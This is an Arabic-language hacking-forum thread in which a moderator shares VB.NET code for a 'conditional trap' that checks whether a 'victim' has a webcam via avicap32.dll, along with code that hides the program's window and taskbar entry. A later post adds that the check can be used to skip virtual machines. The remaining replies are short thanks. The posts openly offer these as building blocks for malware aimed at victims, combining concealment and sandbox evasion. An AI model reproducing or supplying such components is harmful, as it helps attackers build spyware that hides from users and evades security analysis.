1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ✶ s c я є α м | المشاهدات : 712 | الردود : 14
حالة الموضوع:
مغلق
  1. ✶ s c я є α м IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    681
    الإعجابات المتلقاة:
    701
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    [​IMG]




    [​IMG]
    السلام عليكم ....كود بسيط بدوت نت تحقق من كام الضحيه لو الضحيه يوجد بجهازه كام يشتغل الشرط او العكس لو تبغاء ضحايا ماعندها كام أنت بكيفك !$_@ انا افضل ضحايا بدون كام أنت شو تفضل ؟ ((هههههههههههه)) )4:"​



    هاذا Function
    كود:
        Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, _
                                                                     ByVal lpszName As String, ByVal CbName As Integer, ByVal lpszVer As String, _
                                                                     ByVal cbVer As Integer) As Boolean
        Public Function Camera() As Boolean
            Try
                Dim d As String = Space(100)
                For i As Integer = 0 To 4
                    If capGetDriverDescriptionA(i, d, 100, Nothing, 100) Then
                        Return True
                    End If
                Next
            Catch ex As Exception
            End Try
            Return False
        End Function
    *=== تحديد كود ===*
    وهاذا الكود تضعه في Form1_Load
    او تضعه في Button1 الي يريحك :ُeُ!e1:​
    كود:
            If Camera() = True Then
                MsgBox("Camera=Yss")
            Else
                MsgBox("Camera=No")
            End If
    *=== تحديد كود ===*


    وهاذا كــود زياده على الطبخه اخفاء الفورم :cًoُnُfuُseٌd:​
    كود:
            '' اخفاء الفورم 
            Me.Hide()
            Me.ShowIcon = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0
            Me.ShowInTaskbar = 1 / 0 / 1 / 0 <> 1 / 0 / 1 / 0
    *=== تحديد كود ===*




    وهاذا شررح للي مافهم شي:ُeُeX:​
     
  2. ✶ s c я є α м IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    681
    الإعجابات المتلقاة:
    701
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    نسيت أذكر ان بأمكانــك تخطي الانظمة الوهميه بنفس الكود لن الانظمة الوهميه بدون كام {1!$1}
     
  3. rebih Developer

    الأنتساب:
    ‏11 مايو 2014
    المشاركات:
    91
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows xp
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكووور ابدعت [​IMG]لا تحرمنا من جديد ك
     
  4. ✶ s c я є α м IP: 90.148.234.7 مشرف

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    681
    الإعجابات المتلقاة:
    701
    نقاط الجائزة:
    515
    الإقامة:
    7
    نظام التشغيل:
    windows xp
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    اهلا بيك اخي الغالي&:":&:":
     
  5. ♥IRAQ♥ Abo Ameer DeveloPer Plus

    الأنتساب:
    ‏23 ديسمبر 2014
    المشاركات:
    180
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:
    50
    الوظيفة:
    مهندس معماري
    الإقامة:
    ارض الحسين
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مشكور على الطرح ابدعت وجيد جدا
     
  6. Janet CHaldean مشرفه أقسام التصميم والجرافيكس V • I • P

    الأنتساب:
    ‏5 يناير 2015
    المشاركات:
    538
    الإعجابات المتلقاة:
    1,238
    نقاط الجائزة:
    515
    الجنس:
    أنثى
    الوظيفة:
    Diplomacy
    الإقامة:
    Kingdom of Norway
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت الايادي
     
  7. ȤōŘϴ DeveloPer Plus

    الأنتساب:
    ‏24 أكتوبر 2014
    المشاركات:
    303
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك :{14}:
     
  8. Mr-TiGeR9 Developer

    الأنتساب:
    ‏25 مارس 2015
    المشاركات:
    4
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مآ شآء الله , مآ شآء الله ~

    جمييل جمييل ~


    ً#ٌ5oًًًُ.
     
  9. المعاقب الصدري V • I • P

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    924
    الإعجابات المتلقاة:
    681
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    مبدع سكريم :{1!}:
     
  10. Girl - SilenT <span style="font-weight: bold; text-shadow: #BBBB مشرفات المنتدى

    الأنتساب:
    ‏1 ابريل 2015
    المشاركات:
    236
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: كود تلغيــمه شرطيه تحقق من الكام vb.net- Camera ^_^

    عاشت ايدك​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة